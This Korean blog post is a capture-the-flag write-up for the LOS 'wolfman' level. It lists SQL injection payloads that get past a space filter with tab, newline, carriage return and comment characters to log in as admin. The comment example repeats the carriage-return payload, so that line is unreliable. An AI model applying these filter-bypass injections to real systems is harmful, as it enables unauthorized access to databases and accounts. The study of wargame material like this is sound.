레벨 5 wolfman 문제 풀이
제시 문제
※ url에 ?를 쓰면 query를 날릴 수 있다.
즉 url에 ?pw=+을 넣어보면, '' 안에 값이 입력된다.
이번 문제는 preg_match로 공백이 필터링이 되어있는 것을 알 수있다.
구글에 공백우회를 검색해 대입해본다.
(1) 더하기 : +
- pw=1+or+id='admin'
(2) Tab : %09
- pw=1%27%09or%09id=%27admin
(3) Line Feed (\n): %0a
- pw=1%27%0aor%0aid=%27admin
(4) Carrage Return(\r) : %0d
- pw=1'%0dor%0did='admin
(5) 주석 : /**/
- pw=1%27%0dor%0did=%27admin
(6) 괄호 : ()
- pw=(1%27)or(id=%27admin)
2번에서 우회에 성공해 문제가 클리어되었다. 1,6을 제외한 tab, lind feed, carrage return, 주석이 우회에 성공했다.
참고 블로그
SQL Injection 공백 우회방법
SQL Injection 공격시 공백 문자 필터링시 우회 방법 1. Tab : %09 - no=1%09or%09id='admin' 2. Line Feed (\n): %0a - no=1%0aor%0aid='admin' 3. Carrage Return(\r) : %0d - no=1%0dor%0did='admin' 4. 주석..
binaryu.tistory.com
'Wargame' 카테고리의 다른 글
| [LOS] 7번 orge 문제풀이 (0) | 2022.01.17 |
|---|---|
| [LOS] 6번 darkelf 문제 풀이 (0) | 2022.01.16 |
| [LOS] 4번 orc , 파이썬 자동화 코드 만들어보기 (0) | 2022.01.16 |
| [LOS] 3번 goblin (0) | 2022.01.08 |
| [LOS] 2번 cobolt (0) | 2022.01.08 |
